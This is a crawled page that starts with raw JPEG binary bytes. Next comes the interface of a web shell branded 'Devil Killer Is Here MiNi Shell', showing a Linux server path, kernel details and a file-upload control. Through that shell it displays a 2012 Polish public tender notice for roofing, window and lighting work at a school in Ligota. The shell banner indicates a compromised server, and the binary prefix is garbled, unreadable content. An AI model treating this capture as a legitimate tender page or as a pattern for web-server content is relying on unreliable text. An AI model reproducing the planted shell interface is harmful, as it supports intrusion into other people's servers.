JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/231383-N-2012.html

<p class="kh_header"><b>Czechowice-Dziedzice: Zmiana pokrycia dachu , wykonanie okien i oświetlenia w Zespole Szkół w Ligocie</b><br>
<b>Numer ogłoszenia: 231383 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Placówek Oświatowych , ul. Ligocka 1, 43-502 Czechowice-Dziedzice, woj. śląskie, tel. 032 2152057, 2144869, faks 032 2144870.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zopo.czechowice-dziedzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana pokrycia dachu , wykonanie okien i oświetlenia w Zespole Szkół w Ligocie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie -Zmiana pokrycia dachu, wykonanie okien i oświetlenia w Zespole Szkół w Ligocie, obejmującej w szczególności czynności na, które składa się:
- ustawienie rusztowań,
- roboty rozbiórkowe pokrycia stropodachu i fragmentów wypełnienia ścian,
- pokrycie stropodachu,
- montaż okien i wykończenie elewacji,
- obróbki blacharskie, montaż rynien, rur spustowych i parapetów.

 Przedmiot zamówienia opisany jest szczegółowo w niżej wymienionych załącznikach 
    do siwz,  stanowiących integralną część nin. specyfikacji:
 - dokumentacji projektowej,
 - przedmiarze robót,
 - specyfikacji technicznej wykonania i odbioru robót budowlanych.

U w a g a : Wykonawca powinien zapoznać się z dokumentacją przetargową i zaistnienie ewentualnych niezgodności lub braków zgłosić zamawiającemu w trybie art. 38 ustawy Pzp.
Prace wykonywane będą przy czynnym obiekcie.
Wykonawca nie może doprowadzić do dezorganizacji pracy działających oddziałów szkolnych i innych  komórek organizacyjnych szkoły oraz sytuacji która mogłaby zagrozić zdrowiu i życiu osób przebywających na terenie szkoły.
UWAGA:
Termin  prac o dużym natężeniu dźwięku  każdorazowo należy uzgadniać pisemnie z Dyrekcją Zamawiającego. Nie dopuszcza się prac o dużym natężeniu dźwięku między godziną 8.00-14.00 - duże natężenie dźwięku określone jest powyżej 85dB
- do przejęcia terenu budowy w terminie do 5 dni roboczych od daty podpisania umowy ogrodzenia, oznakowania, ochrony placu budowy, utrzymania czystości i porządku na terenie budowy i wokół budowy oraz we własnym zakresie stworzenia zaplecza socjalnego dla swoich  pracowników(szatnia ,WC,itp.) Zamawiający nie będzie udostępniał żadnych pomieszczeń znajdujących  się na jego terenie.
- dostarczenia na swój koszt i ryzyko materiałów niezbędnych do wykonania przedmiotu umowy.
Wykonawca zabezpieczy salę gimnastyczną przed ewentualnym zalaniem ze szczególnym uwzględnieniem istniejącej  posadzki sportowej

3. Roboty realizowane będą na podstawie dokumentacji projektowej, opracowanej przez INWEST-BUD Jerzy Stawowczyk
4.Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia, jeżeli taka potrzeba zaistnieje.
5. Zamawiający dopuszcza zastosowanie materiałów i urządzeń innych (równoważnych) niż te przyjęte w siwz i jej załącznikach ( dot. materiałów i urządzeń dla których określono typ , jednak o parametrach i jakości nie gorszych (równoważnych) od parametrów posiadanych przez materiały i urządzenia  zaproponowane przez zamawiającego. W ofercie należy określić parametry i producenta przyjętych materiałów zamiennych. Zastosowane materiały winny być dopuszczone do obrotu i stosowania w budownictwie i uzyskać aprobatę projektanta.
Wykonawca zobowiązany jest zgodnie z art.30 ust.5 ustawy Pzp poinformować Zamawiającego o fakcie złożenia oferty równoważnej poprzez załączenie wykazu innych niż w siwz materiałów oraz kart katalogowych lub temu podobnych dokumentów. Materiały równoważne, to materiały o parametrach jakościowych tożsamych lub lepszych niż uwzględnienie w projektach. 
Udowodnienie równoważności leży po stronie Wykonawcy. Proponowane w ofercie równoważne materiały muszą spełniać wymagania określone w art. 30 ust 1-3 i ust 5 ustawy Pzp. Złożone w toku postępowania dokumenty posłużą Zamawiającemu do dokonania oceny czy oferta jest równoważna.
W przypadku, gdy zastosowanie materiałów lub urządzeń równoważnych wymagać będzie zmiany dokumentacji projektowej, koszty przeprojektowania poniesie Wykonawca. Wskazanie przez Wykonawcę materiałów równoważnych bez przedstawienia dokumentów na potwierdzenie równoważności spowoduje wezwanie Wykonawcy do przedstawienia brakujących dokumentów w trybie art.26 ust.3 w związku z art.25 ust 1 ustawy Pzp. Funkcje i cechy rozwiązań równoważnych wg wymogów Zamawiającego nie mogą odbiegać i być jakościowo niższe niż określone parametrami w dokumentacji projektowej i przedmiarach robót
Materiały  będą posiadać atesty i świadectwa dopuszczające do zastosowania w budownictwie wydane przez upoważnione instytucje zgodnie z ustawą prawo budowlane.
- do natychmiastowego usunięcia  nieczystości z dróg dojazdowych i chodników powstałych na skutek wykonywania przedmiotu umowy,
- do pokrycia wszelkich opłat i kar nałożonych  przez właściwe podmioty, organy, instytucje za dokonane przez Wykonawcę złamanie prawa, przekroczenie  norm i przepisów w trakcie realizacji umowy oraz zawinione zaniedbania,
- do rzetelnego prowadzenia dziennika budowy i realizacji zaleceń wpisanych,
- do posprzątania każdego pomieszczenia po zakończeniu prac wraz z umyciem stolarki okiennej (od wewnątrz i od zewnątrz wraz z parapetami) i stolarki drzwiowej, oraz po zakończeniu robót teren budowy doprowadzić do stanu pierwotnego.
- do wywozu i składowania odpadów na wysypisko wraz z utylizacją.
6. Od momentu protokolarnego przejęcia terenu budowy  do chwili zrealizowania przedmiotu umowy Wykonawca ponosi odpowiedzialność  na zasadach ogólnych za szkody na osobie i mieniu wynikłe na obiekcie. 
7.Wykonawca zobowiązany jest do prowadzenia robót zgodnie z projektem, z zachowaniem wszystkich warunków podanych w dokumentacji, pod nadzorem osoby posiadającej odpowiednie uprawnienia budowlane .
8. Wykonywanie robót, odbiory oraz organizację (bhp,p.poż oraz koordynacja w zakresie  bhp) na terenie prowadzonych robót należy prowadzić w oparciu o aktualne normy i  przepisy.
9. Wskazanym jest, aby Wykonawca przed złożeniem oferty  zapoznał się z dokumentacją projektową, specyfikacją i przedmiarami robót oraz dokonał wizji lokalnej obiektu (po wcześniejszym uzgodnieniu z administratorem) dla prawidłowej oceny przedsięwzięć organizacyjnych i technicznych, koniecznych do należytego wykonania zamówienia oraz ilości i rodzaju robót, które przyjmie do wykonania- obecność potwierdzona przez Dyrekcję Szkoły - dokument dołączyć do materiałów przetargowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium na rzecz Zespołu Obsługi Placówek Oświatowych 43-502 Czechowice-Dziedzice ul. Ligocka 1  w wysokości 20 000,00 zł.(dwadzieścia trzy tysiące złotych 00/100) przed upływem terminu składania ofert tj. 14.11.2012 r. do godziny 10.00
Wykonawca , który nie wniesie wadium zostanie wykluczony z postępowania o udzielenie zamówienia.
2.Wadium może być wniesione w jednym lub kilku następujących formach:
a. pieniądzu,
b. poręczeniach bankowych; lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręcznie kasy jest zawsze poręczeniem pieniężnym,
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych.
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego na konto: 84 1020 1390 0000 6702 0025 0605.

Uwaga:  Przy wnoszeniu wadium przelewem dokument polecenia dokonania przelewu jest dowodem wniesienia wadium; dokumentem potwierdzającym dokonanie wpłaty wadium jest uznanie kwotą wadium rachunku zamawiającego( wpływ środków na rachunek zamawiającego przed upływem terminu składania ofert).

4.Wadium w postaci dokumentu należy złożyć w formie oryginału w Sekretariacie Zespołu Obsługi Placówek Oświatowych w Czechowicach-Dziedzicach ul. Ligocka 1 
Gwarancja wpłaty wadium winna być bezwarunkowa i płatna na pierwsze żądanie .
 Uwaga - termin ważności gwarancji nie może być krótszy niż termin związania  ofertą  tj. 30 dni.
5.Zwrot wadium :
1)Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania , z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza 
( z zastrzeżeniem art. 46 ust. 4a ustawy pzp)
2)	Wykonawcy, którego oferta została wybrana  jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie  po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia  należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zwrot wadium wniesionego w pieniądzu nastąpi zgodnie z art.46 ust. 4 Pzp.
6.Zamawiający żąda ponownego wniesienia  wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust.1 , jeżeli w  wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza . Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
7.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
-Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art.26 ust.3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 , lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nienależących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonywania oceny spełnienia warunku - na podstawie oświadczenia wykonawcy opisanego w części VI pkt. II ppkt. 1 siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia warunku:
Wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
- dwóch robót budowlanych odpowiadających przedmiotowi zamówienia 
   (remont dachu ) o wartości nie mniejszej niż 300 00,00 zł. brutto każda w 
   zakresie robót budowlano wykończeniowych oraz robót budowlanych,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonywania oceny spełnienia warunku - na podstawie oświadczenia wykonawcy opisanego w części VI pkt. II ppkt. 1 siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia warunku;
  - Dysponowanie osobami posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami zgodnie z przepisami ustawy Prawo budowlane ustawa z dnia 7 lipca 1994 (j.t.Dz.U. z 2010 r. Nr 243 poz. 1623 z późn. zmianami) tj. w szczególności:
-Dysponowanie kierownikiem budowy, który:
Posiada odpowiednie uprawnienia budowlane określone przepisami Prawa Budowlanego do kierowania robotami w specjalności konstrukcyjno budowlanej  lub odpowiadające im uprawnienia  wydane na podstawie wcześniej obowiązujących przepisów -  posiada co najmniej 3-letnie doświadczenie  w kierowaniu budową   należy do OIIB i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej

- Przedłoży zaświadczenie lekarskie dla osób pracujących na wysokości
Doświadczenie zawodowe powinno być liczone  od dnia uzyskania uprawnień zawodowych do dnia składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu dokonywania oceny spełnienia warunku;

- ubezpieczenie wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 1 000 000 zł.

 - Wykonawca jest zobowiązany udowodnić zamawiającemu iż będzie dysponował odpowiednimi zasobami finansowymi niezbędnymi do wykonania zamówienia. 

2) Nie podlega wykluczeniu z postępowania:

 Opis sposobu dokonywania oceny - wykonawca wykaże brak podstaw do wykluczenia z postępowania na podstawie art.24 ust. 1 Prawo zamówień publicznych.
Sposób dokonywania oceny - na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń, o których mowa w części VI pkt III pkt 1-6  siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- kosztorys ofertowy
- zaparafowany projekt umowy(załącznik nr 6)
- wykaz materiałów i  urządzeń zamiennych w przypadku zastosowania zamienników z akceptacją projektanta.
- Zaświadczenie potwierdzone przez Dyrektora Szkoły z wizji lokalnej na terenie obiektu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawarte są we wzorze umowy stanowiącym
Załącznik Nr 6 do niniejszej specyfikacji istotnych warunków zamówienia.
2. Zmiany postanowień umowy .
Zmiana umowy może nastąpić w następujących przypadkach:
a) co do terminu zakończenia zamówienia, który może być przedłużony wskutek:
   a. wystąpienia zdarzeń siły wyższej(trudne warunki atmosferyczne)
   b. przedłużającej się procedur przetargowej;
   c. wstrzymania robót przez Zamawiającego albo przerw w wykonywaniu robót
      powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający;
b) co do wynagrodzenia może nastąpić w przypadku:
   a. odstąpienia (rezygnacji) od części zamówienia;
   b. ustawowej zmiany stawki podatku VAT o kwotę wynikającą ze zmienionych
       stawek tego podatku obowiązujących w dacie powstania obowiązku podatkowego w 
       czasie trwania umowy;
c) co do istotnych postanowień umowy, z ważnych powodów, a w szczególności o ile
     jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć
     w chwili zawarcia umowy.
3. Wymagania zamawiającego dotyczące warunków gwarancji :
Zamawiający wymaga:
a) udzielenia gwarancji jakości
 na wykonane roboty obejmujące przedmiot zamówienia na okres 2 lat, na użyte materiały oraz dostarczone i zamontowane urządzenia na okres zgodny
z gwarancją udzieloną przez producenta lecz nie krócej niż na 2 lata
b) usunięcia usterki i/lub awarii w ciągu 3 dni roboczych (czas usunięcia awarii i usterek
rozumie się jako czas od chwili zgłoszenia do chwili naprawy na miejscu);
c) wymiany wadliwych urządzeń ( lub części urządzeń) na nowe przy 3 naprawach
gwarancyjnych tego samego typu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
